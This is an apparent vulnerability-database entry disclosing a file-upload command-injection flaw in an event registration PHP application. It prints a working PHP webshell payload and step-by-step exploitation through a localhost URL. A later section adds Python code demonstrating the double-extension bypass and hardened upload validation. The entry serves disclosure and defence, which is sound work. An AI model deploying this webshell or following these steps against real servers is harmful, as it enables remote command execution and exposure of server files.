| Title | OS command injection via File Upload in Event Registration System with QR Code |
|---|
| Description | # Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
An OS command injection via file upload issue in Event Registration System with QR Code v1.0 allows an authenticated admin to upload a PHP file through the user-creation form and execute arbitrary OS commands on the server, which can expose all internal files on the system. The upload is accepted even though the name carries a `.png` part, and Apache maps the request to the PHP handler because of the final `.php` suffix.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
Steps:
1) Log in as ADMIN.
2) Go to http://localhost/event/admin/?page=user/list and add a user.
3) Fill in the details and upload the malicious file shown above (`shell.png.php`) as the user image.
4) Save the user.
5) Open the uploaded image in a new tab and append the `cmd` parameter to its URL, for example:
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) The output of the command is returned, confirming that OS commands are executed on the server. |
|---|
| User | lucifoxer001 (UID 33693) |
|---|
| Submitted | 2022-11-26 15:26 (4 years ago) |
|---|
| Moderation | 2022-11-30 11:50 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 214590 [SourceCodester Event Registration System 1.0 cmd privilege escalation] |
|---|
| Points | 17 |
|---|
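The bypass in the report works because a check that looks for an image extension anywhere in the name, or only at the first dot, accepts `shell.png.php`, while the web server decides the handler from the last suffix. The Python below is an added example, not the vendor's code and not part of the submission: `naive_check` models that weak pattern (an assumption about the bug class, not the project's actual source), and `validate_upload` plus `stored_name` show the checks a fixed upload handler should perform: reject any executable suffix anywhere in the name, allow-list the final extension, confirm the content's magic bytes match it, and never use the client-supplied filename on disk. The sample PNG header and PHP payload bytes are constructed inline.

```python
import os
import secrets

# Extensions the application actually needs for a user image.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes of the allowed formats, taken from the public format specs.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Suffixes a typical Apache + PHP setup hands to the PHP interpreter no
# matter what precedes them in the name.  Rejected outright wherever they occur.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def naive_check(filename):
    """Illustrative weak check (assumption, not the project's code): it only
    asks whether an image extension appears somewhere in the name, so
    'shell.png.php' passes."""
    lowered = filename.lower()
    return any(f".{ext}" in lowered for ext in ALLOWED_EXTENSIONS)


def all_extensions(filename):
    """Every dot-separated suffix of the base name, lower-cased.
    'shell.png.php' -> ['png', 'php']; '.htaccess' -> ['htaccess']."""
    base = os.path.basename(filename)
    return [part.lower() for part in base.split(".")[1:]]


def validate_upload(filename, content):
    """Return (ok, detail).  detail is the validated extension on success,
    otherwise a short rejection reason."""
    exts = all_extensions(filename)
    if not exts:
        return False, "no extension"
    # Any executable suffix anywhere in the name is enough to reject: the
    # server's handler choice keys on the last one, and rewrite rules may
    # strip trailing parts.
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        return False, "executable extension in name"
    final = exts[-1]  # Apache picks the handler from the LAST suffix
    if final not in ALLOWED_EXTENSIONS:
        return False, f"extension .{final} not allowed"
    if not any(content.startswith(magic) for magic in MAGIC[final]):
        return False, "content does not match extension"
    return True, final


def stored_name(ext):
    """Server-chosen on-disk name: random token plus the validated extension.
    The client-supplied name never reaches the filesystem, so neither a
    double extension nor a path component can influence how it is served."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: the webshell from the report and a minimal PNG header.
    webshell = b'<?php echo "Shell";system($_GET[\'cmd\']); ?>'
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8

    print("naive check accepts shell.png.php:", naive_check("shell.png.php"))
    print("hardened check:", validate_upload("shell.png.php", webshell))
    print("hardened check, PHP body under .png:", validate_upload("avatar.png", webshell))
    ok, ext = validate_upload("avatar.png", png_header)
    print("hardened check, real PNG:", ok, "->", stored_name(ext))
```

Run stand-alone it prints one accepted and three rejected cases. Serving the upload directory with script execution disabled (or storing files outside the web root and streaming them through a download endpoint) is the complementary server-side control, since extension and magic checks alone do not stop a polyglot file that is later renamed.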